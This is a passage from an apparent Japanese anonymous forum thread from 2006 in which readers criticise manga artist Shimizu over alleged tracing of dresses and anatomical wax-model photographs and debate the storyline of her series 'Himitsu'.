以前の会社で広告とかをやってたときと、アニメの仕事に関わったときに何度かそう
いう話があった。清水じゃなくて他の作家だったけどね。
イメージというのは大きいので、かなり慎重だよ。
相乗効果を期待されるようなマンガ家が希少ってのはその通りだと思うけどね。


581 :花と名無しさん:2006/10/19(木) 15:44:41 ID:???0
>>579
ヴィヴィアンは海外ブランドなのでまた別かもしれないけど、プライドと
言うよりはイメージの問題じゃなかろうか?

NANA好きファンには受けてもそうじゃない人に嫌われたり、どうしても
低年齢のイメージがつきそう、とか。
そのブランドのイメージがピッタリならいいんだろうけどね。

ところでO氏って誰だろ。

582 :花と名無しさん:2006/10/19(木) 16:35:55 ID:???0
>>578
グロを売りにしているブランドでもなきゃグロはちょっとでも駄目だろ。
常識的に考えて……


583 :花と名無しさん:2006/10/19(木) 16:45:46 ID:???0
>>581
碁漫画とか死帳を描いてる人だろ

584 :花と名無しさん:2006/10/19(木) 18:56:10 ID:???O
>>580>>582
「清水が小物か否か」「グロが良いか悪いか」を問題にした訳じゃなく、
「清水は無理だろ。〜だから」って表現が「清水=エセグロ&小物が世間的にも定説」と思ってるように読めて痛い、
と言いたかっただけなんだが…


585 :花と名無しさん:2006/10/19(木) 19:20:41 ID:???0
小物作家、グロ作家だから引用ダメ、大物、クリーンな作家ならおk
っつーのは企業側の論理。読者にとっては利益ナシ。

使用許可を出す作家を自分の都合で選んだり、
訴訟をちらつかせるなど不当な圧力で引用を阻止したりするのって
一種の批判封じだよ。使用許可頂く為には企業に好かれる作家でなきゃダメなんだから。
大抵、そういう戦術使ってくるのって
儲け過ぎっつーくらい儲けてる大企業・有名ブランドなんだよね。
著作権保護を求める一方で、自社の製品はもはや世界共通文化ですとか威張ってるような。

そうやって大企業、有名ブランドに対して出版・編集者が気を使いすぎになってる陰で
パクられても法的手段に訴えるだけの体力が無くて、泣き寝入りしてる人も多いはず。

586 :花と名無しさん:2006/10/19(木) 20:36:28 ID:???0
>>585
とりあえず

自社ブランドのイメージを損なわない為に
使用許可を出さないのは当然だと思うから
ヴィヴィアンあたりの判断はまぁ普通かなと思う

ディズニーのように著作権の期限を無理矢理
延ばしまで威圧するのは行き過ぎだと思うが

587 :花と名無しさん:2006/10/19(木) 21:17:43 ID:???0
というか、ヴィヴィアンはNANAの作中でヴィヴィアンというブランドのものとして
描かれてるわけだから清水さんとは状況が違う。(NANAは許されるという意味ではないよ)
さも自分が考えたドレス(時に構図まで)であるかのように描いてる清水さんは
やっぱりちょっとかなりどうかと思う。
だからって作中で(例)「晶様のドレスシャネルよ!素敵!」とかやってたら馬鹿だけど。

あ、シャネルのドレスが素敵かどうか、自分は知りませんw

588 :花と名無しさん:2006/10/20(金) 00:09:33 ID:???0
>>584
もういいよ。何時まで引っ張ってんだ。
言い回しよりやったことだしさー。

>>586
同意。
ディズニーはやりすぎだけど、パクはまだいまんとこ被害の方が大きい気が
するなあ。ライオンキングもそうだけどさww


589 :花と名無しさん:2006/10/20(金) 00:18:01 ID:???0
>>587
なるほど。
そりゃ全然違うわな。

そういうケースだと国内ブランドでもっと若い子のファンの多いブランドで
あれば許可が出ることもありそう。


590 :花と名無しさん:2006/10/20(金) 00:39:31 ID:???O
・・・・・なんか当たり前のことを延々語ったり
大袈裟に感心したり、いいかげん馬鹿みたいだよww
シミズンとNANAじゃ流用の意図や趣旨が全く違うのなんて明白じゃん


591 :花と名無しさん:2006/10/20(金) 00:52:06 ID:???0
まあなんだ、>>950は…を覚えるといいと思うよ

592 :花と名無しさん:2006/10/20(金) 00:52:45 ID:???0
うわ、超ロングパスしちゃったよ
>>950じゃなく>>590な orz

593 :花と名無しさん:2006/10/20(金) 01:21:55 ID:???0
950に期待ww

また何か沸いてるんじゃないの?
偶にそういう時期がある。

一番バカなのはパクリで劣化した清水なんだがなあ。


594 :花と名無しさん:2006/10/20(金) 04:05:15 ID:???0
>> 一番バカなのはパクリで劣化した清水なんだがなあ。
その通りではある。が、だからといって
なんでもかんでもケチつける流れにはちょともにょる。
話題がないからいかんともしがたいが。


595 :花と名無しさん:2006/10/20(金) 04:40:20 ID:???0
分かりきった事、と分かりきっている つもり というのが
一番痛い。

議論して再確認する事を「分かりきった無意味な事」と思うなら
掲示板じゃなくてチラ裏にでも書いていればいい

596 :花と名無しさん:2006/10/20(金) 07:37:34 ID:g7oKNE5s0
>なんでもかんでもケチつける流れにはちょともにょる。

逆に何でもかんでも「それは痛い」「思い込み」「決め付け」いうレスが急に増えて
感じるんだが。

で、検証見て無かったりとか。


597 :花と名無しさん:2006/10/20(金) 12:13:56 ID:???O
>で、検証見て無かったりとか。

は具体的にどのレスを指してるの?推測?

598 :花と名無しさん:2006/10/20(金) 12:28:11 ID:???O
絵がパクリとかトレスとかは今更どうでもいいとして、
ストーリーについて逝けなくなってるんだけど。
月の子あたりから変になって来て、かぐや姫ではもうどうしたいのかさっぱり意味不明
その時描きたいものを適当に取り入れたって感じで、
芯も通ってなければ、始めから終わりまでまとまりもない。
おかげで電波になるとこだった、危ない危ないw
よくあんなで編集はOKしたもんだorz

599 :花と名無しさん:2006/10/20(金) 15:07:02 ID:???0
シミズンが変わってしまったのか…
自分が変わってしまったのか…

600 :花と名無しさん:2006/10/20(金) 16:19:36 ID:???0
現実と折り合いつけるのが難しい作風だね。
ドレスのキラキラ、ホモ、かっこいい戦闘シーン、グロ
作者自身の楽しいと思う光景は、こんな現実離れしたものばかりだし。
日常にあるちょっとした異端を面白く描く作者ではない。

601 :花と名無しさん:2006/10/20(金) 16:49:15 ID:???0
>>597

このスレ内でもスペコラのを見てないって人が居たのでそれでしょ。


602 :花と名無しさん:2006/10/20(金) 17:30:04 ID:???0
>>599
シミズンも変わったが、
パクリ判明および激しい劣化以来、確実に(元)ファンの考え方も変わった。
洋服のデザイン流用くらいなら、劣化以前なら叩かれることもなかったであろうに。
(構図パクはまた別として)

603 :花と名無しさん:2006/10/20(金) 17:41:39 ID:???0
>>596
「思い込み」や「決めつけ」による痛いレスが多いのも事実。
ソースは?とつっこまれるとあやふやなことの方が多いし。

誰もパクを擁護してる奴なんていないでそ。
ただ検証に基づいて話をしようってだけで。

604 :花と名無しさん:2006/10/20(金) 19:01:15 ID:???0
ちょっと前のインタビューの話みたいな
うろ覚えのネタまで脳内変換して叩きネタにしてたのは
なんだかなぁと思ったよ。

605 :花と名無しさん:2006/10/20(金) 21:56:36 ID:???0
あのインタビュー話は確かにどうかと思った。

でもつきのことか竜のあたりの雑誌パクはもう画像入手がそもそも現実的には
無理なものが多いんで余計に皆疑心暗鬼になってるのもあると思う。

>>602
パクリ先がマンガとか、大メジャーじゃなかったのが良かったのか悪かったのか。


606 :花と名無しさん:2006/10/20(金) 22:22:54 ID:???0
シミズンはパクやなんかが全体的にこずるい印象なんだよな
好きなイラストレーター・画家、芸能人ほかについては饒舌なのに
パリッシュやアルマ・タデマについては後書でさらっとだけ
一村らについてはおくびにも出してないんだもんなぁ…

607 :花と名無しさん:2006/10/20(金) 23:20:01 ID:???O
検証サイト見て、パクより劣化より
ここまでグロいものを描くようになった事の方がショックだった…

608 :花と名無しさん:2006/10/21(土) 01:06:23 ID:???0
>604
だね。
やっぱりソースは正確に、だね。
でも清水さんがグズグズなのには変わりないけどねw

無邪気を装って好きな作家などを羅列しているのは、
ばれたらやばいパクリを誤魔化したいだけだと思う。
>606が言うように、こずるい。
そして姑息、卑怯。私はそう感じる。

609 :花と名無しさん:2006/10/21(土) 01:42:43 ID:???0
ギエムに関してもむしろ名指しで絶賛してたのは他のバレリーナなんだよね。

逆に自分はあれは本当に資料としてしか使ってないんだなと呆れた。
「まあこの絵(写真・作家)素敵!」というよりは、使えるかどうかという目で
見ていいなあと思うんのだけを持ってきてるんじゃないかな、と。

逆に好き好きいいながら全然影響も無さそうな画家さんもいるので余計に。

まあ推測だけどね。
しかし推測でしか考えようが無いもんなあ、特に昔のパクリは。


610 :花と名無しさん:2006/10/21(土) 01:56:21 ID:???0
>>608
逆に私は、シミズンがパクに関して何も考えてないように感じる。
小ずるい・卑怯というよりも無神経というか。
好きな作家羅列してるのは単純にその時の萌え話をしたいだけで、
パクをつっこまれた際の言い訳のようには感じないんだよね。
「せめて制服くらいは代えとくべきでした」なんて呑気な発言してるくらいだし。

まあ、人の感じ方はそれぞれですな。

611 :花と名無しさん:2006/10/21(土) 02:16:07 ID:???0
「バレちゃやばい」「突っ込まれるのウザイ(反論できないし)」位の甘い・浅い認識
なんだろうなあ。

40こえて、職歴も長いのにアホかあ!ww

他の職種で自分に身近なものに擬えて考えると本気で嫌な話だな。

612 :花と名無しさん:2006/10/21(土) 02:55:52 ID:???0
>610
>人の感じ方はそれぞれですな
そうだね。
私は>610の考え方には賛同できない。
あからまなパクリ元はすべて、たまたまその時に萌えていなかった。
だから羅列しなかった。
それは都合が良すぎるからね。

613 :花と名無しさん:2006/10/21(土) 03:02:56 ID:???0
考え方自体がアホだな(軽いというか……)と思う。
でも悪意も十分に感じます。



つーか、スペコラほんと、何とかならないかなあ。
何で「そのまんま」使ってしまうんだろう?
模写のレベルなんだよ、あれ。子どもが紙を当ててなぞるような。

グロなので人によって意見は分かれるとは思うんだけど、ああいうの好きな
人にはとても綺麗な、感動的な蝋人形なんだよね。
それを先にマンガで「そのまま」描いちゃうって……手垢付けられたみたい
だなあ。最初に、新鮮に味わえるはずの感動を奪われてしまうわけで……

パクの問題とは別に、物を作る人間の倫理観とか自尊心とか、そういうもの
がこの人には無いんだなとあれを見て思った。

写真集のほうは特に構図が素晴らしいので、あれをまんまなぞったっての
がどうにもやるせない。(しかもページ増量yしてクライマックスだしさ……)


614 :花と名無しさん:2006/10/21(土) 03:07:26 ID:???0
613
ごめん、続投。

例えばああいうの見て「うお!」と思ったとして、あれを題材に自分なりに消化
していれば、自分なりに、美しさぎりぎりの腐敗みたいなものを探れたら、それ
はスペコラをモデルにしても別物だね、と自分は思えたんだよね。
(この辺、パク問題としては緩い考えかもしれんのでごめん。あくまでも個人的心情)

でも、美しい未成熟な少女→美少年、若い死せるキリスト→美少年、みたいに
顔だけスゲ替えられたあの絵がグロよりも滑稽で、ひたすら情けなかった。

初見の人は、特にああいうものを好かない人はあそこで「うわ!」と驚いたかも
しれないけど、それは全部ただの安っぽいグロで、スペコラをなぞったトレス線
に過ぎないわけで……虚しくないのかなあ。



615 :花と名無しさん:2006/10/21(土) 14:19:47 ID:???0
虚しいと思ってないからずっとやってるんでそ。
私は、単に写して描くのが好きなんだと思ってる。大人のぬりえ感覚。
そこにパクに対する罪悪感もなく、ただ楽しくてやってるんだろう。

616 :花と名無しさん:2006/10/21(土) 14:38:57 ID:???0
楽しくて……はあるかもなあ。
「いいなと思ったものを真似する」行為は子供の人真似を考えるに
楽しい場合もあるんだよね。
パクリはいい大人のやることじゃないし楽しまれちゃたまらないけど。

617 :花と名無しさん:2006/10/21(土) 16:09:35 ID:???0
秘密のアレは、スペコラを全然知らなかったから、最初「うおーすげー」と思って
素直に感心したよ。
そっかー、清水さんが描くとグロもこんなにきれいなんかーとまで。

ここ来てアレに元ネタが、しかもモロにそのものズバリなのがあると知って、
言葉もないくらいにがっくり来た。

618 :花と名無しさん:2006/10/21(土) 20:53:36 ID:???0
>>615
ツッコミまでもが空しくなるなあ。
ホントどうしようもないっつーか。
しかし空しい。

>>617
スペコラはやはり初見だとオリジナルだと誤解させられちゃうよな、あれ。
それで原典見ると本当にそのまんまだもんなあ。
うう、何か気の毒だ。


619 :花と名無しさん:2006/10/22(日) 00:44:17 ID:???0
>615
>罪悪感もなく
確かに罪悪感はないんだろうね。
でもそれは楽しいからやっちゃってるだけじゃない。
そんな無邪気なものじゃないと思うよ。
「最近は色々と怖いから、制服ぐらいは〜」という言葉でも、
犯罪という認識があるとういことはわかる。
悪いことだと分かっていてもやってしまう。
清水さんにないのは、順法精神。



620 :花と名無しさん:2006/10/22(日) 01:36:39 ID:???0
シミズンはほとぼりが冷めるまで佐賀県にでも潜伏すればよろし。

621 :花と名無しさん:2006/10/22(日) 02:02:54 ID:???0
罪悪感がなくチラシのウラならいいけど、あれで商売にしてるからなあ。
悪意あるだろうし、仮に無くてもそりゃそれですげえアホだよなあ。


622 :花と名無しさん:2006/10/22(日) 02:14:03 ID:???0
>619
だよねー
著作権切れのものは丸パクリ。
足がつきそうに無い雑誌からもほぼぱくり。
すぐにばれそうで本当にやばいものは、一応いろいろ変えてるからね。
犯罪意識充分でしょ。


623 :花と名無しさん:2006/10/22(日) 08:54:41 ID:???0
名前の出し方がね…

パクル気持ちは軽いんだと思う。そういう意味での罪悪感は欠如してそう。


624 :花と名無しさん:2006/10/22(日) 12:39:17 ID:???0
「いろいろと怖い」ってのは犯罪の認識があって出た言葉なのかなあ?
それじゃ「悪いことやってるからばれないようにした方がいいですよね」って
言ってるも同然。そんなことをファンへの回答(しかも直筆)に書くのか?

逆に「大したことじゃないのに突っ込まれるのが怖い」みたいな意識で
罪悪感なんて無いに等しかったりするんじゃないのかという気もする。

625 :花と名無しさん:2006/10/22(日) 13:50:29 ID:???0
シミズンのいう所の「いろいろと怖い」ってのは
「いちいち突っ込んでくる馬鹿がいるしねwああ怖い怖いw」
って感じっぽい
指摘してくる相手を小馬鹿にしてるというか、そんな感じ

626 :花と名無しさん:2006/10/22(日) 14:05:58 ID:???0
「パクは犯罪、だからごまかさないとヤバい」ではなくて、
「細かいところ突っ込んでくるオトナゲない人がいるんだよねぇ」だと思う。
パクリという意識さえない気がする。こういう絵を描きたいと思って、楽しく
模写してるの、ってだけ。

そういやコミックスの空きにカラー絵の描き方レクチャーしてて、
「まず、描きたい絵のイメージが浮かんだら、そのイメージに合う
写真や絵を探します」とかあったんだよね。
犯罪の意識があればこんなこと書かない。

627 :花と名無しさん:2006/10/22(日) 14:13:02 ID:???0
実際どういうつもりで「いろいろと怖い」と言ったのか訊いてみたいもんだ。

628 :花と名無しさん:2006/10/22(日) 15:34:50 ID:???0
この人って漫画家の中では結構儲けてるほうなのかな?
関係ないけどミルキーウェルの続編?のジャックしか出てないけど
「22XX」ってやつが一番好きだ。後味悪い作品だけど。

629 :花と名無しさん:2006/10/22(日) 20:31:14 ID:???0
そろそろ上げときますね

630 :花と名無しさん:2006/10/22(日) 21:02:56 ID:???0
「秘密」の一家惨殺事件の話。
リードを外されたワンコが絹子が惨殺した少年の遺体を発見する、
あの小屋?のシーン…
あれも「バロック・アナトミア」の写真に似ているような気がするんだけど、
肝心のコミクスが手元にないorz
少女の模型じゃなくて、「4つの死の劇場」ってタイトルがつけられたやつ。

ガイシュツだったらスルーよろ


631 :花と名無しさん:2006/10/22(日) 21:11:11 ID:???0
>「まず、描きたい絵のイメージが浮かんだら、そのイメージに合う
>写真や絵を探します」とかあったんだよね。

自分はこうやってるのかな。

すごい間違ったやり方だよなあ。


632 :花と名無しさん:2006/10/22(日) 22:58:58 ID:???0
>>624 >>625 >>626
そんなトコでしょうね。突っ込まれて軽く逆ギレ。
家具屋序盤でイーグルを描いた時に
ミリタリーオタクから間違いを指摘されて半ギレ状態だったけど、
それと同じくらいにしか思ってないんでしょう。

633 :花と名無しさん:2006/10/22(日) 23:15:15 ID:???0
あー、あの半ギレ、相当ムカツいてたんだろうなあ。
何度も読んだ。
萩尾さんと浦澤さんとの対談中にも話してた。
あれは間違いじゃなくワザと変えたんだみたいなことを言ってた。
真顔でpgrな気持ちになった。


自分的に「ハ?」と思ったのは、その対談中でイーグルを書いたことを
喋ってた下りかな。何か妙な感じだった。
現物とって置いたらよかったけど、無いので書けない。


634 :花と名無しさん:2006/10/22(日) 23:21:11 ID:???0
633補足

pgrったのは、何度も見た後だったからです。
「うわ、ここでまでその話かよ!」と。

当時は家具屋激つまんなかったけど、ここまでパクとかも酷いと思って
なかったし、何より連載中だったのでまだほのかに期待してました。
風呂敷くらいは畳むだろうと。
そして折角の萩尾さん、更には珍しい浦澤さんとの対談だったのでもっと
別の話をして欲しかったんで。


635 :花と名無しさん:2006/10/22(日) 23:41:48 ID:???0
私は「いろいろと怖い〜」というのは
「盗作には厳しくなってきてますからね」という意味に取った。
>こういう絵を描きたいと思って、楽しく
>模写してるの、ってだけ。
いい年齢のプロがそれだけとは思えないなー。
ま、それでもいいけどね。
清水先生は世間知らずで無邪気なお馬鹿さんってことで。

636 :花と名無しさん:2006/10/23(月) 00:13:49 ID:???0
>628
私もわりと好き。
月の子連載と同時掲載で前後編だったんだよね。表紙まで描いてて、よく仕事するな〜って感心した覚えがある。
でも、コミックス加筆版より雑誌掲載時の方が好きだ。月の子最終回とか蝶々も然り。
絵が大きくなるのはいいんだけど、不粋なシーンが増えるんだよね。蝶々で最後に(読者に)正体ばらすシーンは不要だったと思う。

637 :花と名無しさん:2006/10/23(月) 01:45:51 ID:???0
秘密じゃ増やしたページでパクリグロ画像追加だよ。
アホかと思った。


638 :花と名無しさん:2006/10/23(月) 23:52:19 ID:???0
>637
そうそう、あの見開きね。
ページ開いた時はうぉあっ!って思ったけど
「ん??よく見なくても丸写し?」
なにやってんだよー!こっちが恥ずかしいよ!
と思った。

639 :花と名無しさん:2006/10/26(木) 07:58:30 ID:???O
昨夜テレビで「16歳差の双子」を見て、このスレ思い出した。

もしかしてドナーの設定もパクリなの?

640 :花と名無しさん:2006/10/26(木) 08:52:08 ID:???0
パクっつーか、あれはありがちな話だと思ったけど。
受精卵をわざと双子状態にして、年齢差つけて産ませるってのはSF設定だろうけど。

641 :花と名無しさん:2006/10/26(木) 14:12:52 ID:???0
いやそれは双子以前に
クローンとはなんぞや、という所から勉強したほうが
いいような

642 :花と名無しさん:2006/10/26(木) 17:59:01 ID:???0
ドナー設定、個人的にツボど真ん中萌え設定だったのに
結局、台無しにされますた

643 :花と名無しさん:2006/10/26(木) 22:02:59 ID:???0
「グラックの卵」っていうSF短編集読んだら、地球が怪鳥の卵だったという話が
載ってた。SF好きには有名な本らしいけど、ジャック&エレナでそんなのあったよね…
パクリというより種本だろうけど。

644 :花と名無しさん:2006/10/27(金) 11:25:24 ID:???0
「22XX」って「XX」の部分には
「エックスエックス」ってよみがなついてるけど
「22」の部分はどう読めばいいんだろうとずっと悩んでいる

645 :花と名無しさん:2006/10/27(金) 11:55:37 ID:???0
にーにーえっくすえっくす

646 :花と名無しさん:2006/10/27(金) 21:40:20 ID:???0
にーにーばつばつと呼んでいる。
あのヒロインはなかなか好きだった。
当時は月の子もクライマックス前で盛り上がってたなー

647 :花と名無しさん:2006/10/27(金) 21:57:03 ID:???0
自分、音読の時は「とぅえにーとぅーだぶるえっくす」って読んでたんだけど
そうか、えっくすえっくすだったのか orz

648 :花と名無しさん:2006/10/28(土) 00:34:21 ID:???0
にーにーぺけぺけではないんですかそうですか

649 :花と名無しさん:2006/10/28(土) 00:55:52 ID:???0
清水さんは正直タイトルセンス皆無だと思う。
「22XX」もネタに詰まった結果だろうと思って、はなから解読放棄した。
>にーにーぺけぺけ
でもこれはいいなw

650 :花と名無しさん:2006/10/28(土) 09:30:36 ID:???0
そういや、「月の子」も「輝夜姫」も、もらいものタイトルだもんな。

651 :花と名無しさん:2006/10/28(土) 11:00:40 ID:???0
「ナポレオン・ソロ」もね。
「八月の長い夜」については偶然を主張していて見苦しかった。

652 :花と名無しさん:2006/10/28(土) 11:08:07 ID:???0
元々インスパイヤというか、パクが「創作」の源な人なんだろうな…

653 :花と名無しさん:2006/10/28(土) 11:45:02 ID:???0
他のタイトルの大半はもらいものではないわけだし
もらいものタイトルって漫画界ではままあることだから
その辺は見逃してやっても良いんじゃないだろうか。





し か し 肝 心 の 中 身 が ア レ な わ け で す が 。

654 :花と名無しさん:2006/10/28(土) 14:11:59 ID:???0
空港でショナがセツのコート人に渡しちゃった時は、凍死させる気かよと思った。その場では自分の貸してたけど。
振った後で美術館の外で待ってたりとか、彼の行動はいまいちピントがずれている。

655 :花と名無しさん:2006/10/28(土) 20:15:08 ID:???0
秘密のネタバレ
妊娠出産で中断してた秘密が今月号でようやくオワタ、読んでたけどやっぱり中断長かったからストーリー良くわからない
要は知恵遅れのヘンタイに去勢された男の子が事件通報しなかった目撃者を恨んで起こしたってことでよい?
今回も足りない説明を単行本で書き足すのかな?あんまりグロ描写はなかったよね
これからはLaLaじゃなくてメロディで描いていくのかなぁ・・・WILDCATSもデカイ版形で出しなおしたよね

656 :花と名無しさん:2006/10/28(土) 20:46:45 ID:???O
あんまり売れない本はでかくなる。でかい方が利益が多い。

657 :花と名無しさん:2006/10/28(土) 21:16:21 ID:???0
家具やの前半で、
アメリカかどっかの公園で
でミラーがクローン由を見かけた
って場面(多分クローン由の初登場シーン)
由がかぶってる帽子のナイキマークが
ゆがみすぎててウケマシタ。

658 :花と名無しさん:2006/10/28(土) 21:35:25 ID:???0
秘密読んだ。
設定が無茶苦茶すぎて突っ込む気も起きない。


659 :花と名無しさん:2006/10/29(日) 13:01:51 ID:???0
>>654
揺れる男心を表現したかったと思われるが
中身だけさらっていくのカコイイ
振ったようで実は待ってるカコイイ
てな感じで整合性も考えずに
萌えシチュばかりテキトーにつなぎあわせた結果。
最後の最後で突然抱いたのもわけわからんという意見もさんざんガイシュツ。

660 :花と名無しさん:2006/10/29(日) 15:46:24 ID:???0
>>658
海野十三ファンの友人にはウケていた。

661 :花と名無しさん:2006/10/29(日) 16:18:12 ID:???0
メロスレでも受けてた。海野十三ファンが多いのか?w

662 :花と名無しさん:2006/10/29(日) 16:19:26 ID:???0
>660
だからなに?

663 :花と名無しさん:2006/10/29(日) 16:33:06 ID:???0
SF小説の祖であるうんの読みの友人のお眼鏡にかなった秘密すんばらしい。
てことじゃ?

664 :花と名無しさん:2006/10/29(日) 16:38:04 ID:???0
>>662
いや・・内臓も脳味噌も電気部品みたいに考えてる小説の好きな人が喜んでるってことだから・・・。
清水せんせには海野の「恐るべき口笛」を漫画化してほしいな、と。
ぁー、最後に少女歌劇のスタァが首から大出血しながら歌うやつ。

「カストラート」にも反応してたな;。
いまのところ古楽研究ではカストラートも地声は男声と考えられてるらしいけど;。

「百歳写真」で涙するわしよりこっちのほうが正常なんだろうか???

665 :花と名無しさん:2006/10/30(月) 02:24:46 ID:???0
完結したのにレス少ないな…

666 :花と名無しさん:2006/10/30(月) 02:36:07 ID:???0
清水さんはカストラートの詳細なんか理解してないよ。

667 :花と名無しさん:2006/10/30(月) 12:48:06 ID:???O
>>666は詳しい人?なんか突っ込みドコロがあったんなら是非。

668 :花と名無しさん:2006/10/30(月) 14:14:41 ID:???0
映画「カストラート」のことかいの?

669 :花と名無しさん:2006/10/30(月) 23:36:23 ID:???0
>666
それは私も思った。
多分かなり勘違いしてるね。

670 :花と名無しさん:2006/10/31(火) 20:09:53 ID:???0
今月号の「秘密」、メロスレで感動してるって言ってる人がふたりいたけどなんか自演っぽかった。

671 :花と名無しさん:2006/10/31(火) 20:38:44 ID:???0
まあいいじゃない。
私は読む価値もないクズだと思ってるけど。

672 :花と名無しさん:2006/10/31(火) 22:20:18 ID:???0
途中かなり間があいたからなー。まとめて読んだら印象変わるかも。
立ち読みだけど、感想は「また棒涙か」だけだった。

673 :花と名無しさん:2006/10/31(火) 23:07:14 ID:???0
これまでの経過をもう忘れちゃったよ〜
コミックスいつ出るのかな

674 :花と名無しさん:2006/10/31(火) 23:16:12 ID:???0
>>670
あの完結でどう感動すれば良いのか自分は困ったよ。
清水さんの作品はどれでもある程度泣けるけど今回だけは×。
妹のためと言うよりもチンポコンプレックスの強いガキが気の弱い性犯罪者を利用した自己中な犯罪にしか受け取れなかった。
これで「秘密」シリーズも糞作品殿堂入り。

675 :花と名無しさん:2006/10/31(火) 23:40:22 ID:???0
>674
結局作品で何が言いたかったのやら、さっぱりわからんよね。
別に作品に明確なテーマ性を持たせろとは言わないけど、
今回ほど読後に「だから何??」と思ったことは無い。
設定にリアリティが無いから、全てが嘘臭いんだよね。
キャラの突飛な行動を「人間心理の恐ろしさ」と捕らえる人は親切だな〜と思う。


676 :花と名無しさん:2006/11/01(水) 00:14:20 ID:???O
・こんな自分じゃ親に受け入れて貰えないと思ったから、とか
・妹は目を閉じてたから『秘密』は守られてるよっていう嘘、とか
感動ポイントを作ろうとしてんのはわかるんだけど、あざと過ぎて引いてしまう。
それに、リアリティのなさも含めて話作りが粗雑だし、色んなもの盛込み過ぎて散漫になっちゃってんだよね…


『秘密』も最初の大統領のとか、貝沼の話ぐらいまでは設定やリアリティに無理があっても、
幾つかのエピソードが最終的にはちゃんとまとまって、山場をきちんと盛り上げてたから、
一応の感動があった気がするんだけどね…


677 :花と名無しさん:2006/11/01(水) 00:26:56 ID:???0
>676
>・こんな自分じゃ親に受け入れて貰えないと思ったから
そこらへんは、まあわかる。
だからって加害者の所に戻るかね?
普通に考えたら発狂か、死亡に至る所業を加えた異常者の所にさ。

678 :花と名無しさん:2006/11/01(水) 01:02:10 ID:???0
ネタバレおkなの?

679 :花と名無しさん:2006/11/01(水) 04:31:01 ID:???0
今更ネタバレ嫌がる真性ファンはこんなとこ来ないで
ファンサイトいってるだろ・・w

680 :花と名無しさん:2006/11/01(水) 11:47:07 ID:???0
ファンサイトなんてまだあるんだ。
mixiとか?

681 :花と名無しさん:2006/11/02(木) 01:08:21 ID:???0
つか、ネタバレされて困るような「事の顛末ドキワクです」な話でもないような。

682 :花と名無しさん:2006/11/02(木) 23:36:52 ID:???0
清水って細かい心理描写ド下手だからね。
勉強する気も無いっぽいし。
知的障害者を加害者に据えたのも
「精神薄弱な人間はトンでもな行動をとっても当たり前だから突っ込まれない」
とか安直に考えた結果のようで、なんか腹タッター。

683 :花と名無しさん:2006/11/03(金) 01:25:11 ID:???0
つーか、薪を筆頭に第9の連中ってば、ことごとく無脳。
第9って、じつは屑の吹き溜まりじゃネーノとか思った。

684 :花と名無しさん:2006/11/03(金) 09:01:38 ID:???0
無能っつーか、よく考えたら映像をずっと見て細かいことに
気付くかどうかだけの捜査だよな。ま、それはそれで大変だし精神的には
かなりしんどいだろうとは思うが。

685 :花と名無しさん:2006/11/03(金) 10:59:06 ID:???0
秘密は1巻で終わってればよかったのかも

686 :花と名無しさん:2006/11/03(金) 13:09:35 ID:???0
>682
>清水って細かい心理描写ド下手だからね。
じゃあ何が上手なんだと聞かれると(ry

687 :花と名無しさん:2006/11/03(金) 15:42:00 ID:???0
劣化模写上手

688 :花と名無しさん:2006/11/03(金) 21:06:14 ID:???0
第9って功殻機動隊の影響?
薪が素子で、映像捜査はブレインダイブのつもりで描いてんだろうか?

689 :花と名無しさん:2006/11/03(金) 23:43:38 ID:???0
>>683
ハゲド。
薪が証拠となる画像改ざんしてんのに('A`)ウヘァ
お前何様だよ。
しかも青木感動してるし。

690 :花と名無しさん:2006/11/04(土) 09:59:53 ID:???0
>>664>>666>>668
いや、「カストラート」ネタはいいとオモタヨ。犯人が正体あらわすとき声がいきなり女声から男声に変わるつーと考えると。

691 :花と名無しさん:2006/11/04(土) 15:51:01 ID:???0
ワイルドキャットの完全版を見かけて、懐かしいなーと思って買って、
おや?と思いこのスレに辿り着いたものの。
かぐやひめ前半で脱落したままのほうがよかったのか?

シーザーがぼっちゃんに発情してる最終話をどうかなと思っただけ
だったのに。竜の眠る星…ああ……

692 :花と名無しさん:2006/11/04(土) 19:24:54 ID:???0
>690
カストラートの手術では不適切な処置で死亡したり
発狂した少年も多かったということだから、
単純に面白ネタとして使われると違和感。

693 :花と名無しさん:2006/11/04(土) 20:58:03 ID:???0
それがシミズンクオリティ。

694 :花と名無しさん:2006/11/04(土) 21:02:50 ID:???0
薪が佳人の声を最初に聞いた時にカストラートに気付くべきだったとか言ってたけど
 気付くかそんなもん
と突っ込みたくなった。

695 :花と名無しさん:2006/11/04(土) 21:09:37 ID:???0
たしかにw

696 :花と名無しさん:2006/11/05(日) 14:22:45 ID:???0
異常殺人を見せる矯めの作品だから、横溝正史の小説みたいに
殺される予定の人はすべて殺されるのがお約束になっているから。
そうすると第9の面々が優秀じゃ話が続かないわけでw

697 :花と名無しさん:2006/11/05(日) 14:59:41 ID:???0
池沼の素人が切り落としたのに、
命が無事だったどころか
自力で歩いて自宅に辿り着いてる時点で…

ありえない話で後半流し読みになったよ。

698 :花と名無しさん :2006/11/05(日) 17:21:31 ID:k9M5jGof0
しかも、往復しちゃっているしね・・・




699 :花と名無しさん:2006/11/05(日) 18:23:36 ID:???0
>696
殺人を防げなかったら無能と言ってるんじゃないよ。
そもそも横溝作品は奇怪な犯罪の物理的な謎解きが面白いんだから、
秘密とはまったく違う。
まあ無能というのは言葉が違ったかもね。
たいして操作の役に立ってないくせに、頭脳明晰ぶったり、思わせぶりなことを言ったり
証拠改ざんなど警察官にあるまじき最悪行為するあたり、無能じゃなくて、低脳。

700 :花と名無しさん:2006/11/05(日) 19:51:17 ID:???0

シミズンはそんな薪に萌えてるのです

701 :花と名無しさん:2006/11/06(月) 00:06:45 ID:???0
家具屋の悪夢再び。

702 :花と名無しさん:2006/11/07(火) 13:44:05 ID:???0
そのうち薪が華麗なwアクションを繰り広げそうだ

703 :花と名無しさん:2006/11/07(火) 13:55:58 ID:???0
次回作あたりで見られそうだなw

704 :花と名無しさん:2006/11/08(水) 14:26:12 ID:???0
でもべつにフツーに面白かったよ。
もっとページがあれば良かったのにとは思ったけど。

705 :花と名無しさん:2006/11/08(水) 16:05:05 ID:???0
色々意味で単行本を楽しみにしている>ヒミツ
シミズンはマキを何でも出来るカコイイ!にしたいだけじゃないかと
思う。自分の萌えをつめこんでるというか。

706 :花と名無しさん:2006/11/08(水) 18:01:22 ID:???0
それをした結果が晶タンの「モテモテ、アクションもばっちり、キレると怖い」じゃないかー。

707 :花と名無しさん:2006/11/08(水) 18:11:54 ID:???0
いずれにせよマッキーはだんだん黒くなっていくのでは。
でも晶というよりデスノートのライトみたいになりそうだがw

708 :花と名無しさん:2006/11/08(水) 20:33:48 ID:???0
